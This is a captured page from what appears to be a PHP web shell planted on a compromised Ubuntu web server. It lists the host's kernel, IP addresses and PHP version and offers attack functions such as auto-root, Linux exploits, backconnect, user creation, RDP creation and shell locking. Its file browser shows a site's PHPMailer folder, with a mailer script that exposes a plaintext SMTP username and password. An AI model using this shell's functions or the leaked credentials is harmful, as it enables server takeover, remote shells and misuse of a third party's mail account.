Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.191.218.234
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
gack /
libs /
phpmailer /
[ HOME SHELL ]
Name
Size
Permission
Action
cManualMailer.php
1.52
KB
-rwxr-xr-x
class.phpmailer.php
78.17
KB
-rwxr-xr-x
class.pop3.php
10.14
KB
-rwxr-xr-x
class.smtp.php
24.01
KB
-rwxr-xr-x
mailTest.php
988
B
-rwxr-xr-x
phpmailer_doc.html
34.5
KB
-rwxr-xr-x
test1.php
1004
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cManualMailer.php
<?php function send_manual_mail($to,$subject,$message,$replay_to=null,$cc=null,$bcc=null) { require_once(dirname(dirname(__FILE__)).'/phpmailer/class.phpmailer.php'); $mail = new PHPMailer(); $mail->IsSMTP(); // telling the class to use SMTP $mail->SMTPSecure = "SSL"; $mail->Host = "smtpout.secureserver.net"; // SMTP server $mail->SMTPDebug = 0; // enables SMTP debug information (for testing) $mail->SMTPAuth = true; // enable SMTP authentication $mail->Port = 80; // set the SMTP port for the GMAIL server $mail->Username = "support@logisys.org"; // SMTP account username $mail->Password = "logisys"; // SMTP account password // $mail->AddReplyTo("admin@visbin.com","First Last"); $to_arr=explode(",",$to); foreach($to_arr as $v) { if(!empty($v)) $mail->AddAddress($v,$v); } $cc_arr=explode(",",$cc); foreach($cc_arr as $v) { if(!empty($v)) $mail->AddCC($v,$v); } //$mail->AddBCC("natesha.s@tarkasoft.com",'Natesha S'); $mail->AddReplyTo("support@logisys.org","support@logisys.org"); $mail->SetFrom('support@logisys.org', 'support@logisys.org'); $mail->WordWrap = 50; // set word wrap $mail->IsHTML(true); // send as HTML $mail->Subject = $subject; $mail->Body = $message; $mail->AltBody = $message; if(!$mail->Send()) { $data="Message was not sent Mailer Error: " . $mail->ErrorInfo; } else { $data='true'; } return $data; } ?>
Close